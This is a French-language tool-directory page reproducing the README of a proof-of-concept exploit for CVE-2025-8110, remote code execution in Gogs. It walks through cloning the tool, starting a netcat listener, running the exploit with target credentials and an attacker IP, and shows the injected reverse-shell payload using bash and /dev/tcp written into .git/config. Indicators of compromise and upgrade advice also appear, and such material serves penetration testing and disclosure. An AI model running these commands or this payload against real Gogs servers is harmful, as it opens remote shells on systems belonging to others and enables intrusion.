Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
Outils/GitHubGitHub/x4brozer/cve-2025-8110
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE Gogs (CVE-2025-8110)

Python License

Preuve de concept pour CVE-2025-8110 - Exécution de code à distance dans Gogs via un contournement de lien symbolique et une injection de sshCommand.

Description

Cet exploit exploite un contournement de lien symbolique dans l'API Gogs pour écraser .git/config et injecter une sshCommand malveillante qui exécute un shell inversé.

Prérequis

  • Python 3.12+
  • Git installé
  • Identifiants Gogs valides
  • Jeton API Gogs

Installation

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

Utilisation

Étape 1 : Obtenir un jeton API

Connectez-vous à Gogs → Paramètres → Applications → Générer un jeton

Étape 2 : Démarrer l'écouteur

root@kitploit:~
nc -lvnp 4444

Étape 3 : Exécuter l'exploit

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

Exemple

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Fonctionnement

  • Crée un dépôt avec un lien symbolique vers .git/config
  • Utilise l'API PutContents pour écrire dans le lien symbolique
  • Injecte sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
  • Gogs exécute la commande → shell inversé

Dépannage

ProblèmeSolution
Échec de connexionVérifiez le nom d'utilisateur/mot de passe
Échec de création du dépôtRégénérez le jeton API
Délai de lecture dépasséNormal - vérifiez l'écouteur
Pas de shellVérifiez le pare-feu, essayez un autre port

Indicateurs de compromission

  • Noms de dépôts aléatoires de 8 caractères
  • Lien symbolique malicious_link dans les dépôts
  • sshCommand dans .git/config

Remédiation

Mettez à jour vers Gogs v0.13.4 ou ultérieur :

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Avertissement légal

Cet outil est destiné à des fins éducatives et de tests autorisés uniquement. Tout accès non autorisé est illégal.

Crédits

  • Découverte : Wiz Research
  • PoC original : zAbuQasem
  • Exploit : X4BROZER
Télécharger l’outil
ArgumentDescription
-u, --urlURL cible Gogs (ex : http://target:3000)
-U, --usernameNom d'utilisateur Gogs
-P, --passwordMot de passe Gogs
-t, --tokenJeton API Gogs
-lh, --hostVotre IP pour le shell inversé
-lp, --portVotre port pour l'écouteur
-x, --proxyActiver le proxy (localhost:8080)